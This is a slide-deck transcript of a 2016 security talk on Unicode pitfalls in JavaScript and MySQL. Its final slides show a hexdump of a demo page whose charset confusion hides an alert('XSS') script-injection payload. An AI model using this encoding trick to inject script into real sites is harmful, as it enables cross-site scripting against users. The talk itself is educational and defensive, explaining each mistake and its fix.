Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Hacking with Unicode in 2016

Mathias Bynens
April 29, 2016
Technology
14
14k

Hacking with Unicode in 2016

This presentation explores common mistakes made by programmers when dealing with Unicode support and character encodings on the Web. For each mistake, I explain how to fix/prevent it, but also how it could possibly be exploited.

#ruhrsec

Video: https://www.youtube.com/watch?v=HhIEDWmQS3w

Mathias Bynens

April 29, 2016
Tweet

More Decks by Mathias Bynens

See All by Mathias Bynens
V8 internals for JavaScript developers @ Fronteers 2018
mathiasbynens
2
400
V8 internals for JavaScript developers
mathiasbynens
1
620
What’s new in ES2018?
mathiasbynens
1
66
V8 internals for JavaScript developers
mathiasbynens
0
65
Preventing timing attacks on the web @ Fronteers Jam 2016
mathiasbynens
3
170
Front-End Performance: The Dark Side @ ColdFront Conference 2016
mathiasbynens
0
250
Front-End Performance: The Dark Side @ Fronteers Spring Conference 2016
mathiasbynens
15
56k
3.14 things I didn’t know about CSS @ CSSConf.asia 2015
mathiasbynens
3
770
3.14 things I didn’t know about CSS @ CSS Day 2014
mathiasbynens
69
28k

Other Decks in Technology

See All in Technology
ローコードで改革!End to Endテストの再定義!
odasho
0
180
就活は相談したもの勝ち
carta_engineering
0
130
また(CDK界隈の)世界を縮めてしまった
bun913
0
550
Pain-free APIs with Smithy4s
kubukoz
0
150
"Accelerate State of DevOps" ウェブアプリケーションのdeliveryを考えるとき、今何をすればいいのか
renjikari
3
310
Autonomous Database - Dedicated 技術詳細 / adb-d_technical_detail_jp
oracle4engineer
PRO
1
2.5k
“品質”をみんなのものにするために行なっている入社者オンボーディング/Onboarding new members to think about "quality" together
mii3king
0
260
可能な限り確実にmkdirを成功させるには / Make mkdir
oogfranz
PRO
0
110
WebGLやCanvasを使ったデータ可視化コンテンツ開発/nikkei-tech-talk5-3
nikkei_engineer_recruiting
0
140
軽率に休学したら Babylon.js×WebARで 夢を3つ叶えてた / my dreams with babylon.js and WebAR
drumath2237
0
140
AstroNvim を使おう!
ybrliiu
0
180
AWS CDKで作るCloudWatch Dashboard
harukasakihara
3
670

Featured

See All Featured
Clear Off the Table
cherdarchuk
79
290k
Agile that works and the tools we love
rasmusluckow
321
20k
BBQ
matthewcrist
75
8.2k
Web development in the modern age
philhawksworth
197
9.6k
Music & Morning Musume
bryan
37
4.7k
Design and Strategy: How to Deal with People Who Don’t "Get" Design
morganepeng
109
16k
How GitHub (no longer) Works
holman
299
140k
The Invisible Side of Design
smashingmag
292
49k
Building Applications with DynamoDB
mza
86
5k
Fantastic passwords and where to find them - at NoRuKo
philnash
32
1.9k
Bootstrapping a Software Product
garrettdimon
299
110k
The Invisible Customer
myddelton
113
12k

Transcript

  1. @mathias · #ruhrsec
    Hacking with Unicode

    View Slide

  2. @mathias

    View Slide

  3. 1. Unicode
    2. Encodings for Unicode
    3. Unicode in JavaScript
    4. Unicode in MySQL
    5. Hacking with Unicode
    What we’ll cover

    View Slide

  4. 1. Unicode

    View Slide

  5. code point unique name
    symbol/glyph

    View Slide

  6. A
    LATIN CAPITAL LETTER A
    U+0041

    View Slide

  7. a
    LATIN SMALL LETTER A
    U+0061

    View Slide

  8. ©
    COPYRIGHT SIGN
    U+00A9

    View Slide


  9. SNOWMAN
    U+2603

    View Slide

  10. PILE OF POO
    U+1F4A9
    !

    View Slide

  11. U+000000 → U+10FFFF

    View Slide

  12. (0x10FFFF + 1) code points

    17 planes
    (0xFFFF + 1) code points each

    View Slide

  13. Unicode plane #1
    U+0000 → U+FFFF
    Basic Multilingual Plane
    a.k.a. BMP

    View Slide

  14. Unicode planes #2-17
    U+010000 → U+10FFFF
    supplementary planes
    astral planes

    View Slide

  15. 2. Encodings

    View Slide

  16. Code point range UTF-8 UTF-16 UTF-32 UTF-EBCDIC GB 18030
    U+000000 – U+00007F 1
    2
    4
    1
    1
    U+000080 – U+00009F
    2
    2 for characters
    inherited from
    GB 2312/GBK
    (e.g. most
    Chinese
    characters);
    4 for
    everything else
    U+0000A0 – U+0003FF 2
    U+000400 – U+0007FF
    3
    U+000800 – U+003FFF
    3
    U+004000 – U+00FFFF
    4
    U+010000 – U+03FFFF
    4 4 4
    U+040000 – U+10FFFF 5
    Number of bytes per code point

    View Slide

  17. Code point range UTF-8 UTF-16 UTF-32 UTF-EBCDIC GB 18030
    U+000000 – U+00007F 1
    2
    4
    1
    1
    U+000080 – U+00009F
    2
    2 for characters
    inherited from
    GB 2312/GBK
    (e.g. most
    Chinese
    characters);
    4 for
    everything else
    U+0000A0 – U+0003FF 2
    U+000400 – U+0007FF
    3
    U+000800 – U+003FFF
    3
    U+004000 – U+00FFFF
    4
    U+010000 – U+03FFFF
    4 4 4
    U+040000 – U+10FFFF 5
    Number of bytes per code point

    View Slide

  18. 3. JavaScript " Unicode
    https://mths.be/jsu

    View Slide

  19. Hexadecimal escape sequences
    >> '\x41\x42\x43'
    'ABC'
    >> '\xA9 Caf\xE9 XYZ'
    '© Café XYZ'
    can be used for U+0000 → U+00FF

    View Slide

  20. Unicode escape sequences
    >> '\u0041\u0042\u0043'
    'ABC'
    >> 'I \u2661 JavaScript!'
    'I ὑ JavaScript!'
    can be used for U+0000 → U+FFFF

    View Slide

  21. …what about astral
    code points?

    View Slide

  22. …what about !?
    *…and other, equally important astral symbols
    *

    View Slide

  23. !

    View Slide

  24. Unicode code point escapes
    >> '\u{41}\u{42}\u{43}'
    'ABC'
    >> '\u{1F4A9}'
    '!' // U+1F4A9
    can be used for U+000000 → U+10FFFF
    ES6

    View Slide

  25. Surrogate pairs
    >> '\uD83D\uDCA9'
    '!' // U+1F4A9
    can be used for U+010000 → U+10FFFF

    View Slide

  26. Surrogate pairs
    // for astral code points (> 0xFFFF)
    function getSurrogates(codePoint) {
    var high = Math.floor((codePoint - 0x10000) / 0x400) + 0xD800;
    var low = (codePoint - 0x10000) % 0x400 + 0xDC00;
    return [ high, low ];
    }
    function getCodePoint(high, low) {
    var codePoint = (high - 0xD800) * 0x400 + low - 0xDC00 + 0x10000;
    return codePoint;
    }
    >> getSurrogates(0x1F4A9); // U+1F4A9 is !
    [ 0xD83D, 0xDCA9 ]
    >> getCodePoint(0xD83D, 0xDCA9);
    0x1F4A9
    https://mths.be/bed

    View Slide

  27. JavaScript string length
    >> 'A'.length // U+0041
    1
    >> 'A' == '\u0041'
    true
    >> 'B'.length // U+0042
    1
    >> 'B' == '\u0042'
    true

    View Slide

  28. String length ≠ char count
    >> '!'.length // U+1D400
    2
    >> '!' == '\uD835\uDC00'
    true
    >> '"'.length // U+1D401
    2
    >> '"' == '\uD835\uDC01'
    true

    View Slide

  29. String length ≠ char count
    >> '!'.length // U+1F4A9
    2
    >> '!' == '\uD83D\uDCA9'
    true

    View Slide

  30. String length ≠ char count
    >> '!'.length // U+1F4A9
    2
    >> '!' == '\uD83D\uDCA9'
    true
    insert obligatory
    “number two” joke here

    View Slide

  31. Real-world example

    View Slide

  32. Real-world example

    View Slide

  33. View Slide

  34. View Slide

  35. String character count
    function countSymbols(string) {
    return punycode.ucs2.decode(string).length;
    }
    >> countSymbols('A') // U+0041
    1
    >> countSymbols('!') // U+1D400
    1
    >> countSymbols('!') // U+1F4A9
    1
    https://mths.be/punycode

    View Slide

  36. String character count
    function countSymbols(string) {
    return Array.from(string).length;
    }
    >> countSymbols('A') // U+0041
    1
    >> countSymbols('!') // U+1D400
    1
    >> countSymbols('!') // U+1F4A9
    1
    ES6

    View Slide

  37. String character count
    function countSymbols(string) {
    return [...string].length;
    }
    >> countSymbols('A') // U+0041
    1
    >> countSymbols('!') // U+1D400
    1
    >> countSymbols('!') // U+1F4A9
    1
    ES6

    View Slide

  38. JavaScript escape sequences
    http://mths.be/bmf

    View Slide

  39. If we’re being pedantic…
    // it’s actually even more complicated:
    >> 'mañana' == 'mañana'
    false

    View Slide

  40. If we’re being pedantic…
    // it’s actually even more complicated:
    >> 'mañana' == 'mañana'
    false
    >> 'ma\xF1ana' == 'man\u0303ana'
    false
    >> 'ma\xF1ana'.length
    6
    >> 'man\u0303ana'.length
    7

    View Slide

  41. function countSymbolsPedantically(string) {
    // Unicode Normalization, NFC form:
    var normalized = string.normalize('NFC');
    // Account for astral symbols / surrogates:
    return Array.from(normalized).length;
    }
    >> countSymbolsPedantically('mañana') // U+00F1
    6
    >> countSymbolsPedantically('mañana') // U+006E + U+0303
    6
    Unicode normalization
    http://git.io/unorm
    ES6

    View Slide

  42. Perfect?
    >> var zalgo = 'H
    ̹̙̦̮͉̩̗̗
    ͧ̇̏̊̾
    Eͨ͆͒̆ͮ̃
    ͏̷̮̣̫̤̣ ̵̞̹̻
    ̀̉̓ͬ͑͡
    ͅ
    Cͯ̂͐
    ͏̨̛͔̦̟͈̻
    O
    ̜͎͍͙͚̬̝̣
    ̽ͮ͐͗̀ͤ̍̀
    ͢
    M
    ̴̡̲̭͍͇̼̟̯̦
    ̉̒͠
    Ḛ̛̙̞̪̗
    ͥ
    ͤͩ̾͑̔͐
    ͅ
    Ṯ̴̷̷̗̼͍
    ̿̿̓̽͐
    H
    ̙̙
    ̔̄
    ͜
    ';

    View Slide

  43. Perfect? Nope.
    → can be ‘fixed’ using epic regex-fu
    >> var zalgo = 'H
    ̹̙̦̮͉̩̗̗
    ͧ̇̏̊̾
    Eͨ͆͒̆ͮ̃
    ͏̷̮̣̫̤̣ ̵̞̹̻
    ̀̉̓ͬ͑͡
    ͅ
    Cͯ̂͐
    ͏̨̛͔̦̟͈̻
    O
    ̜͎͍͙͚̬̝̣
    ̽ͮ͐͗̀ͤ̍̀
    ͢
    M
    ̴̡̲̭͍͇̼̟̯̦
    ̉̒͠
    Ḛ̛̙̞̪̗
    ͥ
    ͤͩ̾͑̔͐
    ͅ
    Ṯ̴̷̷̗̼͍
    ̿̿̓̽͐
    H
    ̙̙
    ̔̄
    ͜
    ';
    >> countSymbolsPedantically(zalgo)
    116 // not 9

    View Slide

  44. Reversing a string in JavaScript
    // naive solution
    function reverse(string) {
    return string.split('').reverse().join('');
    }

    View Slide

  45. Reversing a string in JavaScript
    // naive solution
    function reverse(string) {
    return string.split('').reverse().join('');
    }
    >> reverse('abc')
    'cba'

    View Slide

  46. Reversing a string in JavaScript
    // naive solution
    function reverse(string) {
    return string.split('').reverse().join('');
    }
    >> reverse('abc')
    'cba'
    >> reverse('mañana') // U+00F1
    'anañam'

    View Slide

  47. Reversing a string in JavaScript
    // naive solution
    function reverse(string) {
    return string.split('').reverse().join('');
    }
    >> reverse('abc')
    'cba'
    >> reverse('mañana') // U+00F1
    'anañam'
    >> reverse('mañana') // U+006E + U+0303
    'anãnam'

    View Slide

  48. Reversing a string in JavaScript
    // naive solution
    function reverse(string) {
    return string.split('').reverse().join('');
    }
    >> reverse('abc')
    'cba'
    >> reverse('mañana') // U+00F1
    'anañam'
    >> reverse('mañana') // U+006E + U+0303
    'anãnam'
    >> reverse('!') // U+1F4A9
    '��'
    '\uDCA9\uD83D' // the surrogate pair for !, in the wrong order

    View Slide

  49. “I put my thang down,
    flip it, and reverse it”
    — Missy ‘Misdemeanor’ Elliot, 2002

    View Slide

  50. Reversing a string in JavaScript
    // Using the Esrever library
    var reverse = esrever.reverse;
    >> reverse('abc')
    'cba'
    >> reverse('mañana') // U+00F1
    'anañam'
    >> reverse('mañana') // U+006E + U+0303
    'anañam'
    >> reverse('!') // U+1F4A9
    '!'
    https://mths.be/esrever

    View Slide

  51. Iterate over all symbols in a string
    function getSymbols(string) {
    var length = string.length;
    var index = -1;
    var output = [];
    var character;
    var charCode;
    while (++index < length) {
    character = string.charAt(index);
    charCode = character.charCodeAt(0);
    if (charCode >= 0xD800 && charCode <= 0xDBFF) {
    // note: this doesn’t account for lone high surrogates
    output.push(character + string.charAt(++index));
    } else {
    output.push(character);
    }
    }
    return output;
    }
    var symbols = getSymbols('! ');
    symbols.forEach(function(symbol) {
    assert(symbol == '! ');
    });

    View Slide

  52. Iterate over all symbols in a string
    for (const symbol of '!') {
    assert(symbol == '!');
    }
    ES6

    View Slide

  53. This behavior affects
    other string methods, too.

    View Slide

  54. More string madness
    •String#fromCharCode
    •String#charAt
    •String#substring
    •String#slice
    •…anything that involves strings
    •oh, and regular expressions

    View Slide

  55. JavaScript has a Unicode problem
    https://mths.be/jsu

    View Slide

  56. !
    The Pile of Poo Test™
    https://mths.be/jsu

    View Slide

  57. ! is the new %00

    View Slide

  58. 4. MySQL " Unicode

    View Slide

  59. CREATE TABLE `table_name` (
    `id` INT(11) UNSIGNED NOT NULL AUTO_INCREMENT,
    `column_name` VARCHAR(255) NOT NULL DEFAULT '',
    PRIMARY KEY (`id`)
    ) ENGINE=InnoDB DEFAULT CHARSET=utf8;

    View Slide

  60. CREATE TABLE `table_name` (
    `id` INT(11) UNSIGNED NOT NULL AUTO_INCREMENT,
    `column_name` VARCHAR(255) NOT NULL DEFAULT '',
    PRIMARY KEY (`id`)
    ) ENGINE=InnoDB DEFAULT CHARSET=utf8;

    View Slide

  61. mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id = 9001;
    Query OK, 1 row affected, 1 warning (0.00 sec)
    Rows matched: 1 Changed: 1 Warnings: 1
    mysql> SHOW WARNINGS;
    +---------+------+--------------------------------------------+
    | Level | Code | Message |
    +---------+------+--------------------------------------------+
    | Warning | 1366 | Incorrect string value: '\xF0\x9F\x92\xA9' |
    | | | for column 'column_name' at row 1 |
    +---------+------+--------------------------------------------+
    1 row in set (0.00 sec)
    mysql> SELECT column_name FROM table_name WHERE id = 9001;
    +-------------+
    | column_name |
    +-------------+
    | foo |
    +-------------+
    1 row in set (0.00 sec)

    View Slide

  62. mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id = 9001;
    Query OK, 1 row affected, 1 warning (0.00 sec)
    Rows matched: 1 Changed: 1 Warnings: 1
    mysql> SHOW WARNINGS;
    +---------+------+--------------------------------------------+
    | Level | Code | Message |
    +---------+------+--------------------------------------------+
    | Warning | 1366 | Incorrect string value: '\xF0\x9F\x92\xA9' |
    | | | for column 'column_name' at row 1 |
    +---------+------+--------------------------------------------+
    1 row in set (0.00 sec)
    mysql> SELECT column_name FROM table_name WHERE id = 9001;
    +-------------+
    | column_name |
    +-------------+
    | foo |
    +-------------+
    1 row in set (0.00 sec)

    View Slide

  63. mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id = 9001;
    Query OK, 1 row affected, 1 warning (0.00 sec)
    Rows matched: 1 Changed: 1 Warnings: 1
    mysql> SHOW WARNINGS;
    +---------+------+--------------------------------------------+
    | Level | Code | Message |
    +---------+------+--------------------------------------------+
    | Warning | 1366 | Incorrect string value: '\xF0\x9F\x92\xA9' |
    | | | for column 'column_name' at row 1 |
    +---------+------+--------------------------------------------+
    1 row in set (0.00 sec)
    mysql> SELECT column_name FROM table_name WHERE id = 9001;
    +-------------+
    | column_name |
    +-------------+
    | foo |
    +-------------+
    1 row in set (0.00 sec)

    View Slide

  64. mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id = 9001;
    Query OK, 1 row affected, 1 warning (0.00 sec)
    Rows matched: 1 Changed: 1 Warnings: 1
    mysql> SHOW WARNINGS;
    +---------+------+--------------------------------------------+
    | Level | Code | Message |
    +---------+------+--------------------------------------------+
    | Warning | 1366 | Incorrect string value: '\xF0\x9F\x92\xA9' |
    | | | for column 'column_name' at row 1 |
    +---------+------+--------------------------------------------+
    1 row in set (0.00 sec)
    mysql> SELECT column_name FROM table_name WHERE id = 9001;
    +-------------+
    | column_name |
    +-------------+
    | foo |
    +-------------+
    1 row in set (0.00 sec)

    View Slide

  65. mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id = 9001;
    Query OK, 1 row affected, 1 warning (0.00 sec)
    Rows matched: 1 Changed: 1 Warnings: 1
    mysql> SHOW WARNINGS;
    +---------+------+--------------------------------------------+
    | Level | Code | Message |
    +---------+------+--------------------------------------------+
    | Warning | 1366 | Incorrect string value: '\xF0\x9F\x92\xA9' |
    | | | for column 'column_name' at row 1 |
    +---------+------+--------------------------------------------+
    1 row in set (0.00 sec)
    mysql> SELECT column_name FROM table_name WHERE id = 9001;
    +-------------+
    | column_name |
    +-------------+
    | foo |
    +-------------+
    1 row in set (0.00 sec)

    View Slide

  66. MySQL’s ✌utf8✌

    View Slide

  67. ALTER TABLE `table_name`
    CONVERT TO CHARACTER SET utf8mb4
    COLLATE utf8mb4_unicode_ci;
    https://mths.be/utf8mb4

    View Slide

  68. ALTER TABLE `table_name`
    CONVERT TO CHARACTER SET utf8mb4
    COLLATE utf8mb4_unicode_ci;
    https://mths.be/utf8mb4

    View Slide

  69. mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id = 9001;
    Query OK, 1 row affected (0.00 sec)
    Rows matched: 1 Changed: 1 Warnings: 0
    mysql> SELECT column_name FROM table_name WHERE id = 9001;
    +-------------+
    | column_name |
    +-------------+
    | foo!bar |
    +-------------+
    1 row in set (0.00 sec)
    https://mths.be/utf8mb4

    View Slide

  70. mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id = 9001;
    Query OK, 1 row affected (0.00 sec)
    Rows matched: 1 Changed: 1 Warnings: 0
    mysql> SELECT column_name FROM table_name WHERE id = 9001;
    +-------------+
    | column_name |
    +-------------+
    | foo!bar |
    +-------------+
    1 row in set (0.00 sec)
    https://mths.be/utf8mb4

    View Slide

  71. 5. Hacking with Unicode

    View Slide

  72. http://mths.be/brk

    View Slide

  73. $ curl -sL https://mths.be/brk | hexdump -C | tail -n 19
    000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |.H.e.r.e. .|
    000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .|
    000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.|
    000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.|
    00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.|
    00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.|
    00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.|
    00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .|
    00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .|
    00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.|
    00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.|
    00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...|
    00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |.....00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>. alert|<br/>000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS");000003b0 3e 20 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 |> .....000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....|
    000003e0

    View Slide

  74. $ curl -sL https://mths.be/brk | hexdump -C | tail -n 19
    000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |.H.e.r.e. .|
    000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .|
    000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.|
    000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.|
    00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.|
    00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.|
    00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.|
    00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .|
    00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .|
    00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.|
    00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.|
    00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...|
    00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |.....00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>. alert|<br/>000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS");000003b0 3e 20 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 |> .....000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....|
    000003e0

    View Slide

  75. $ curl -sL https://mths.be/brk | hexdump -C | tail -n 19
    000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |.H.e.r.e. .|
    000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .|
    000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.|
    000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.|
    00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.|
    00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.|
    00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.|
    00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .|
    00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .|
    00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.|
    00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.|
    00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...|
    00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |.....00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>. alert|<br/>000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS");000003b0 3e 20 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 |> .....000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....|
    000003e0

    View Slide

  76. $ curl -sL https://mths.be/brk | hexdump -C | tail -n 19
    000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |.H.e.r.e. .|
    000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .|
    000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.|
    000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.|
    00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.|
    00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.|
    00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.|
    00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .|
    00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .|
    00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.|
    00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.|
    00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...|
    00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |.....00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>. alert|<br/>000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS");000003b0 3e 20 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 |> .....000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....|
    000003e0
    (U+3C73 CJK UNIFIED
    IDEOGRAPH-3C73)

    View Slide

  77. $ curl -sL https://mths.be/brk | hexdump -C | tail -n 19
    000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |.H.e.r.e. .|
    000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .|
    000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.|
    000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.|
    00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.|
    00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.|
    00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.|
    00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .|
    00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .|
    00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.|
    00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.|
    00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...|
    00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |.....00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>. alert|<br/>000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS");000003b0 3e 20 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 |> .....000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....|
    000003e0
    (U+6372 CJK UNIFIED
    IDEOGRAPH-6372)

    View Slide

  78. $ curl -sL https://mths.be/brk | hexdump -C | tail -n 19
    000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |.H.e.r.e. .|
    000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .|
    000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.|
    000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.|
    00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.|
    00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.|
    00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.|
    00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .|
    00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .|
    00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.|
    00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.|
    00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...|
    00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |.....00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>. alert|<br/>000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS");000003b0 3e 20 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 |> .....000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....|
